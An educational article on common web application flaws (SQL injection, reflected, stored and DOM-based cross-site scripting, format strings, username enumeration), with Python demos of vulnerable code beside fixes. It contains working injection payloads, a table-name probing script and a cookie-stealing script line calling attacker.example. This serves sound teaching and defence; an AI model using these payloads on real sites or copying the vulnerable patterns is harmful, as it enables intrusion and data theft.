Web site vulnerabilities: SQL injection and cross-site scripting

Running a Web server seems simple to many people, who assume that the security updates provided by server software vendors are sufficient. However, patching security holes in the server software does not protect a site from common attacks aimed at its Web applications. These attacks exploit common coding mistakes in Web applications and can leave the entire site vulnerable.

Five attacks on Web applications are especially common, most of them aimed at applications built with JavaScript or PHP. The five attacks are:

1. SQL injection

2. Cross-site scripting

3. Remote code execution

4. Format string attacks

5. Username enumeration

The first two attack types are used widely enough that they are worth examining in more detail below. The other three are summarized briefly here.

Remote code execution allows an attacker to run code on the server and retrieve data directly from it. In most cases, these attacks take advantage of poor Web application coding, typically involving the register_globals setting in PHP or XML-RPC applications. Fortunately, these attacks have become fairly rare because of changes in recent PHP versions: register_globals is now disabled by default and was eventually removed from the language.
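A short example cannot cover PHP itself, but the register_globals problem can be sketched as a Python analogy. The sketch assumes a hypothetical `admin_page` handler, with a `scope` dictionary standing in for the script's global variables, and a hypothetical `check_password` that always fails. With the setting on, every request parameter becomes a variable, so the attacker can set any variable the script never initializes. This shows only the variable-overwrite step. In real attacks the overwritten variable was often something like a file path that was later loaded as code, which is how the flaw led to code execution.

```python
# Python analogy (hypothetical, not PHP) of what register_globals did:
# every request parameter was copied into the script's variables.

def check_password(user, password):
    # Hypothetical credential check; always fails in this demo.
    return False

def admin_page(request_params, register_globals):
    scope = {}  # stands in for the script's global variables
    if register_globals:
        # Like register_globals: each request parameter becomes a variable.
        scope.update(request_params)
    if check_password(request_params.get("user"), request_params.get("password")):
        scope["authorized"] = True
    # Bug: "authorized" is never initialized to False, so a request
    # parameter of the same name can set it.
    if scope.get("authorized"):
        return "secret admin data"
    return "access denied"

attack = {"user": "eve", "password": "wrong", "authorized": "1"}
print(admin_page(attack, register_globals=True))   # secret admin data
print(admin_page(attack, register_globals=False))  # access denied
```

Initializing `scope["authorized"] = False` before the check closes this particular hole, as does turning register_globals off.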

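Format string attacks exploit user input fields that are not filtered. The attacker adds format tokens to the input (in C's printf family, tokens such as %x and %n). These tokens can print data from memory, crash the program to cause a denial of service, or do similar damage. Format string attacks are easy to prevent: validate user input properly and, above all, never pass user input to a function as its format string.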
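In C the risky call is something like printf(input) instead of printf("%s", input). Python's str.format has an analogous flaw when the user supplies the format string itself, because format fields can follow attribute chains. This minimal sketch assumes a hypothetical module-level `SECRET_KEY` and `User` class. The payload walks from the user object to the module's global variables.

```python
# Hypothetical secret that the attacker should never be able to see.
SECRET_KEY = "s3cr3t-key"

class User:
    def __init__(self, name):
        self.name = name

def greet_vulnerable(user_template, user):
    # Vulnerable: the user controls the format string itself.
    return user_template.format(user=user)

def greet_safe(user_text, user):
    # Safe: the format string is fixed and the user input is only data.
    return "Hello {name}, you wrote: {text}".format(name=user.name, text=user_text)

# Format fields can follow attributes: method -> function globals -> secret.
payload = "{user.__init__.__globals__[SECRET_KEY]}"
print(greet_vulnerable(payload, User("fred")))  # s3cr3t-key
print(greet_safe(payload, User("fred")))        # payload printed as plain text
```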

Finally, username enumeration attacks target the Web server script that verifies a username and password. An attacker submits a series of usernames and passwords and analyzes the error messages generated for invalid combinations. From these, the attacker can detect valid usernames and, eventually, passwords. These attacks have become less common lately because many applications now return the same message for any invalid username-password combination. Enforcing strong passwords also makes these attacks easier to defend against.
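Here is a minimal sketch of the "same message" defense. It assumes a hypothetical in-memory `USERS` store and uses PBKDF2 from Python's standard library for password hashes. The unknown-username and wrong-password branches return an identical `GENERIC_ERROR` string, so the response text no longer tells an attacker which usernames exist.

```python
import hashlib
import hmac
import os

GENERIC_ERROR = "Invalid username or password."

def hash_password(password, salt):
    # PBKDF2-HMAC-SHA256 from the standard library; iteration count is illustrative.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

# Hypothetical user store: username -> (salt, password hash).
_salt = os.urandom(16)
USERS = {"fred": (_salt, hash_password("correct horse", _salt))}
_DUMMY_SALT = os.urandom(16)

def login(username, password):
    record = USERS.get(username)
    if record is None:
        # Do a throwaway hash so an unknown name takes about as long as a
        # wrong password, then return exactly the same message.
        hash_password(password, _DUMMY_SALT)
        return GENERIC_ERROR
    salt, stored = record
    if not hmac.compare_digest(hash_password(password, salt), stored):
        return GENERIC_ERROR
    return "Welcome, " + username

print(login("nobody", "guess"))        # Invalid username or password.
print(login("fred", "guess"))          # Invalid username or password.
print(login("fred", "correct horse"))  # Welcome, fred
```

The throwaway hash matters because identical messages alone can still leak information: if unknown names were rejected before any hashing, they would be answered noticeably faster than wrong passwords.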

SQL Injection

SQL injection exploits a security hole in the database layer of many applications. The attack typically comes through a user input field on a Web page: the application takes the user's entry and uses it as a parameter in a SQL statement that queries a database. This is a very common pattern, especially on sites that ask the user for a username and password and then query a SQL database to verify those credentials. Note that SQL injection attacks differ depending on the database. SQL Server seems to be a regular target for injection attacks, and MySQL has its share. Because each database handles statements a little differently, an attacker must tailor the injection to the database in use.

A SQL injection vulnerability occurs when user input (perhaps supplied through a script or Web interface) is placed in a SQL statement without proper handling. Embedded escape characters such as quotation marks are then interpreted literally as part of the command, which in effect lets the attacker execute a command on the system. The embedded characters may be expanded and handled as a command, or the input may simply change the statement's logic. Either way, unexpected behavior is easy to trigger if the application does not manage its input properly.

An example shows how simple this type of attack can be. We'll stick with SQL statements for this example, but injection attacks can be used wherever user input is accepted. Suppose you have a SQL statement like this, in which the application places the user's input between single quotes:

SELECT mylist FROM mytable WHERE name = '$input';

where $input is input gathered from the user through a prompt, or built up through several prompts to create a complex condition. Typically, the user would type something like "fred", in which case the statement would execute as:

SELECT mylist FROM mytable WHERE name = 'fred';

and return every row whose name field matches. However, if the user types input with an extra single quote at the end, such as "fred'", the SQL parser behaves differently. Typically, the unmatched quotation mark causes a syntax error, since the command now reads:

SELECT mylist FROM mytable WHERE name = 'fred'';

How the syntax error actually shows up depends on how the application is coded and on its internal error-handling routines. Ideally, the application should return a message about an unknown user or illegal characters, or in some other way warn the user that the entry is malformed. However, many applications do not handle this properly. Instead, they pass the command straight to the SQL parser, which interprets it literally. This leaves the application open to abuse.

If the user notices this vulnerability and types the string:

fred' or 1=1--

at the input, the SQL statement parsed becomes:

SELECT mylist FROM mytable WHERE name = 'fred' or 1=1--';

The WHERE clause has gone from a single condition to a Boolean expression with two conditions. The second condition is always true, since 1 always equals 1. Because the two are joined by OR, the entire clause is true regardless of the first condition, so the query returns every row in the table. (The double dash at the end of the user input tells SQL to ignore the rest of the query, so the hanging single quote at the end of the statement does not cause a syntax error. In MySQL, the double dash must be followed by whitespace to start a comment, one of the per-database differences mentioned earlier.)
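The quote-breaking attack can be reproduced with Python's built-in sqlite3 module. An in-memory SQLite database stands in for SQL Server or MySQL. `lookup_vulnerable` is a hypothetical example of the unsafe pattern: it builds the statement by pasting the input between quotes.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE mytable (name TEXT, mylist TEXT)")
conn.executemany("INSERT INTO mytable VALUES (?, ?)",
                 [("fred", "fred-list"), ("alice", "alice-list"), ("bob", "bob-list")])

def lookup_vulnerable(user_input):
    # Vulnerable: the input is concatenated into the SQL text between quotes.
    sql = "SELECT mylist FROM mytable WHERE name = '" + user_input + "';"
    return conn.execute(sql).fetchall()

print(lookup_vulnerable("fred"))                  # [('fred-list',)]
print(len(lookup_vulnerable("fred' or 1=1--")))  # 3: every row matches

try:
    lookup_vulnerable("fred'")  # unmatched quote
except sqlite3.OperationalError as exc:
    print("syntax error:", exc)
```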

This type of injection attack can yield information about the application and its databases. For example, if the user input was:

x' AND 1=(SELECT COUNT(*) FROM tablename)--

and the user kept making guesses at the table name, the query would, in effect, also execute

SELECT COUNT(*) FROM tablename;

The count itself is usually not displayed, but the outcome is revealing. If no table of that name exists, the command fails with an error; if it does exist, the query runs normally. It's easy to write a script that keeps changing "tablename" until the query succeeds. The user then knows the name of the table and can do more damage. For example, if the SQL statement requiring input is this:

SELECT * FROM mytable WHERE name='$input';

and the user injects the string

fred'; DROP TABLE mytable; --

then the SQL statement becomes:

SELECT * FROM mytable WHERE name='fred'; DROP TABLE mytable; --';

The actual string in the WHERE clause doesn't matter. The second statement is what causes the damage: it deletes the table, using the name the user discovered. (This works only where the database and driver accept several statements in a single call. Some refuse, another of the per-database differences noted earlier.)
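The table-name probing described earlier can be sketched with Python's sqlite3 module and an in-memory database. The sketch assumes a hypothetical `customers` table that the attacker is hunting for and a hypothetical `lookup_vulnerable` function that builds the query by string concatenation. The probing script never sees a count. It only notes which guesses make the statement fail with SQLite's "no such table" error.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE mytable (name TEXT, mylist TEXT)")
conn.execute("CREATE TABLE customers (card_number TEXT)")  # hypothetical target

def lookup_vulnerable(user_input):
    # Vulnerable: input concatenated into the SQL text between quotes.
    sql = "SELECT mylist FROM mytable WHERE name = '" + user_input + "';"
    return conn.execute(sql).fetchall()

def probe_table_names(guesses):
    found = []
    for guess in guesses:
        payload = "x' AND 1=(SELECT COUNT(*) FROM " + guess + ")--"
        try:
            lookup_vulnerable(payload)
        except sqlite3.OperationalError:
            continue  # "no such table": wrong guess
        found.append(guess)  # no error, so the table exists
    return found

print(probe_table_names(["users", "accounts", "customers", "orders"]))  # ['customers']
```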

To return to the common case of a username and password verified against a SQL database, the usual approach is a statement like this:

SELECT * FROM mytable WHERE username = '$username' AND password = '$password';

where username and password are fields in mytable, and $username and $password hold the user's input. If the input is not strongly typed or otherwise validated, a user could enter this for the username:

admin'--

which turns the statement into

SELECT * FROM mytable WHERE username = 'admin'--' AND password = '';

The two dashes cause the rest of the command to be ignored, including the mismatched quote and the missing password. As a result, the command logs the user in as "admin" without requiring a password.
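The login bypass can be reproduced with Python's sqlite3 module and an in-memory database. The plaintext password column and the `login_vulnerable` function are hypothetical and kept that way only for brevity. Real applications store password hashes.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE mytable (username TEXT, password TEXT)")
conn.execute("INSERT INTO mytable VALUES ('admin', 'hunter2')")  # plaintext: demo only

def login_vulnerable(username, password):
    # Vulnerable: both inputs are concatenated into the SQL text.
    sql = ("SELECT * FROM mytable WHERE username = '" + username +
           "' AND password = '" + password + "';")
    return len(conn.execute(sql).fetchall()) > 0

print(login_vulnerable("admin", "wrong"))  # False
print(login_vulnerable("admin'--", ""))    # True: logged in with no password
```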

These SQL injection attacks succeed when the application does not properly handle errors or does not use strongly typed input fields. The solution for SQL injection attacks is simple: never embed user input directly in a SQL statement, and ensure that all user input is validated and properly handled. The easiest approach is to use parameterized statements. A parameterized statement keeps the SQL text static and passes user input to it through variables or placeholders, so the database always treats the input as data and never as part of the command.
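Here is a minimal sketch of the parameterized approach using Python's sqlite3 module, whose `?` placeholders bind values separately from the SQL text. Other drivers use different placeholder styles, such as %s or named parameters. The table and the `login_safe` function are hypothetical. The point is that the injection strings from the examples above become ordinary usernames that simply match nothing.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE mytable (username TEXT, password TEXT)")
conn.execute("INSERT INTO mytable VALUES (?, ?)", ("admin", "hunter2"))

def login_safe(username, password):
    # Static SQL text; the driver binds the ? placeholders as values,
    # so quotes and dashes in the input are never parsed as SQL.
    sql = "SELECT 1 FROM mytable WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None

for attempt in ["admin'--", "fred' or 1=1--", "fred'; DROP TABLE mytable; --"]:
    print(attempt, login_safe(attempt, ""))  # False for each

print(login_safe("admin", "hunter2"))  # True
# The table survived the DROP TABLE attempt.
print(conn.execute("SELECT COUNT(*) FROM mytable").fetchone()[0])  # 1
```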

Cross-site Scripting

Cross-site scripting is a technique similar to SQL injection, except that it doesn't need a SQL database to act against. Like SQL injection, cross-site scripting is typically used against Web applications, and it is one of the most common techniques behind phishing attacks.

Cross-site scripting traces its history back to Netscape and the introduction of JavaScript support. Netscape recognized that letting executable code pass between browser and server (or vice versa) posed a major security risk. The risk was greatest when more than one browser window was open and a script from one page (or site) could access data from another page (or site). For this reason, Netscape introduced the "same origin" concept, which lets pages and their contents interact only if they come from the same domain. This prevented a script loaded from one site from using JavaScript to read sensitive data in another site's browser window.
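Modern browsers define an origin more precisely than "the same domain": two URLs share an origin only if their scheme, host, and port all match. The sketch below is a simplified check under that rule, using Python's urllib.parse. It ignores browser special cases such as file: URLs, and `same_origin` is a hypothetical helper, not a browser API.

```python
from urllib.parse import urlsplit

# Default ports for the schemes this simplified sketch handles.
DEFAULT_PORTS = {"http": 80, "https": 443}

def origin(url):
    # An origin is the (scheme, host, port) triple; .hostname is lowercased.
    parts = urlsplit(url)
    port = parts.port if parts.port is not None else DEFAULT_PORTS.get(parts.scheme)
    return (parts.scheme, parts.hostname, port)

def same_origin(url_a, url_b):
    return origin(url_a) == origin(url_b)

print(same_origin("http://www.mysite.com/welcome.html", "http://www.mysite.com:80/account"))  # True
print(same_origin("http://www.mysite.com/", "https://www.mysite.com/"))  # False: scheme differs
print(same_origin("http://www.mysite.com/", "http://mysite.com/"))       # False: host differs
```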

Despite the same origin policy and improvements in client-side scripting language protection, cross-site scripting has become a major issue. Malicious scripts served from one site can gain access to content from another site, sometimes even across browser sessions.

One form of cross-site scripting is the non-persistent, or reflected, vulnerability. Reflected cross-site scripting is common and popular with attackers because it is very easy to use. The server takes data supplied by the Web client, typically in a URL parameter or form field, and immediately reflects it back to the user embedded in an HTML page. The data is not stored, but because it is sent back as unfiltered HTML, any script it contains runs in the user's browser as if it came from the site itself.
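This sketch shows a reflected vulnerability and its usual fix, assuming a hypothetical search page that echoes a `q` parameter from the query string. The vulnerable version pastes the decoded parameter into the HTML. The safe version passes it through Python's html.escape first, so the browser displays the script as text instead of running it.

```python
import html
from urllib.parse import parse_qs

def search_page_vulnerable(query_string):
    term = parse_qs(query_string).get("q", [""])[0]
    # Vulnerable: the request parameter is echoed into the HTML unfiltered.
    return "<p>You searched for: " + term + "</p>"

def search_page_safe(query_string):
    term = parse_qs(query_string).get("q", [""])[0]
    # html.escape converts &, <, >, and quotes into HTML entities.
    return "<p>You searched for: " + html.escape(term) + "</p>"

attack = "q=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E"
print(search_page_vulnerable(attack))
# <p>You searched for: <script>alert(document.cookie)</script></p>
print(search_page_safe(attack))
# <p>You searched for: &lt;script&gt;alert(document.cookie)&lt;/script&gt;</p>
```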

At first glance this may not seem too threatening. But consider a user who shops at an e-commerce site that stores billing information such as credit card details (along with the username and password, most likely encrypted for security). A third party wants to retrieve the billing information for one or more customers. The attacker creates a URL that employs cross-site scripting and sends customers a spoofed email containing that URL, made to look as though it comes from the e-commerce site. Typically, the email asks the user to log in to the e-commerce site in a browser window (for security reasons!) and then click a link in the email to get a special offer. Because the URL in the email points to the genuine e-commerce site, phishing filters are unlikely to be triggered.

The user has logged in to the e-commerce site legitimately in one browser window. The link then opens a new browser window to the same site, with the cross-site scripting code embedded in the URL, so everything looks fine to both the user and the e-commerce site. However, the JavaScript code in the newly opened window now executes exactly as if the e-commerce site had sent it as part of its own HTML. The code can then "steal" the protected information. The site decrypts that information and sends it back to the browser as plain HTML in response to what appears to be a valid user request.

Reflected cross-site scripting is most often used for phishing attacks. One of the best-known examples was an attack on Google.com in late 2005 that allowed the attacker to mount phishing attacks and impersonate Google administrators.

The second form of cross-site scripting, in contrast to the reflected (non-persistent) kind, is persistent cross-site scripting, also called stored or HTML injection cross-site scripting. This is probably the most dangerous type of cross-site scripting attack. With persistent cross-site scripting, data from a client browser is stored on the Web server and later served as HTML to third parties. Typically, these attacks are aimed at sites that let users store content for others to view, such as blogs, message boards, and review sites. If such a site is vulnerable, an attacker can store JavaScript on the Web server that records specific information about other visitors. That information might include cookies or user-entered data such as logins and passwords. One of the more famous persistent cross-site scripting attacks was on the Hotmail site, where all user Passport cookies (which included usernames and passwords) were recorded and sent to the attacker.

Persistent cross-site scripting is dangerous because the attack script needs to be submitted to the Web server only once. It then stays on the site and runs, collecting data, every time the page is viewed. Even if protection against these attacks is added later, the damage has already been done.
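The stored variant differs mainly in where the payload lives. In this sketch a hypothetical in-memory `comments` list stands in for the site's database, and attacker.example is a placeholder domain. The script is posted once and then included in every later rendering of the page. Escaping at render time, as in `render_safe`, also neutralizes payloads stored before the fix, though it cannot recover data already stolen.

```python
import html

comments = []  # hypothetical stand-in for the site's comment database

def post_comment(text):
    # The payload only has to be submitted once...
    comments.append(text)

def render_vulnerable():
    # ...because every later page view includes it, unfiltered.
    return "\n".join("<li>" + c + "</li>" for c in comments)

def render_safe():
    # Escaping on output turns any stored markup into inert text.
    return "\n".join("<li>" + html.escape(c) + "</li>" for c in comments)

post_comment("Great article!")
post_comment("<script>new Image().src='http://attacker.example/c?'+document.cookie</script>")
print(render_vulnerable())
print(render_safe())
```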

A third type of cross-site scripting exploit is called DOM-based or local cross-site scripting. With DOM-based scripting, the flaw lies in the client-side script of the page itself rather than in the server's handling of the request. Suppose a page's JavaScript reads parameters embedded in its own URL and writes the retrieved information into the page as HTML, for example to greet the browser user. Then whoever controls the URL controls what gets written.

Here's a simple example: client-side JavaScript that reads a user name from the page's URL so the page can be personalized:

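var position=document.URL.indexOf("username=")+9;  // 9 = length of "username="
document.write("Hello " + document.URL.substring(position));  // writes the rest of the URL into the page as HTML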

If this code is used on a page such as "http://www.mysite.com/welcome.html", the URL request in the browser would be something like this:

http://www.mysite.com/welcome.html?username=Fred

and the page would display the message:

Hello Fred

This is a common approach on many sites, based on either cookie information or a user input string. However, if the target URL gets this request instead:

http://www.mysite.com/welcome.html?username=<script>alert(document.cookie)</script>

then there's a major security problem (in this case the text after username= could have come from a cookie written during a visit to a suspect Web site). When the browser loads this URL, it parses the HTML into a DOM, which includes an object called "document" with a property holding the URL. When the HTML parser reaches the JavaScript code, it executes it. The code writes the contents of document.URL into the page, so the attacker's script embedded in the URL becomes part of the page and runs. In effect, the attack has executed code in the victim's browser.

A famous example of DOM-based cross-site scripting came in mid-2006, when a fake news item was posted claiming that President Bush had appointed a 9-year-old boy to head the Information Security Department. The item contained links to cbsnews.com and bbc.co.uk, each of which contained JavaScript code that allowed any article of the hacker's choosing to be injected into the site.

Protecting against cross-site scripting attacks is not quite as simple as protecting against SQL injection attacks. Typically, the best protection is to ensure that all incoming data is in an approved format, and a similar set of rules should control any data sent from the server. In both cases, accept only "known good" formats rather than trying to reject "known bad" ones. This gives better control over both input and output.
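The difference between the two approaches shows up quickly in code. This sketch assumes a hypothetical rule that usernames are 1 to 32 letters, digits, or underscores. The allow-list check accepts only input that fully matches that rule. The block-list check looks for one known-bad string and lets simple variants through.

```python
import re

# Hypothetical "known good" rule: 1-32 letters, digits, or underscores.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")

def validate_username(value):
    # Allow list: accept only input that fully matches the approved format.
    return USERNAME_RE.fullmatch(value) is not None

def passes_blocklist(value):
    # Block list, for contrast: rejects one known-bad string only.
    return "<script>" not in value

for candidate in ["Fred_99", "<SCRIPT>alert(1)</SCRIPT>", "<img src=x onerror=alert(1)>"]:
    print(candidate, validate_username(candidate), passes_blocklist(candidate))
# The block list accepts both attack strings; the allow list rejects them.
```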


The five Web application vulnerabilities explained above are among the most threatening, but other vulnerabilities also have to be detected, managed, and defended against. Some of these tend to go in cycles. They rise in popularity until Web developers become aware of the issues and begin coding to avoid them as a matter of course. A good example is the buffer overflow, which overruns an application's buffer, crashes the application, and can allow a remote user to take over the session. Buffer overflows were widely exploited a few years ago but are rarely seen lately.

The biggest issue for most Web developers and site managers is that security issues arise far faster than developers and administrators can handle them. Vulnerabilities are routinely detected, and information about workarounds and protection is widely distributed, yet keeping up with the tide is time-consuming and often difficult. By far the easiest approach is to develop Web application code that avoids most of these exploits naturally, right from the start. That means solid coding, proper validation of input and output, and sufficient, specific error handling.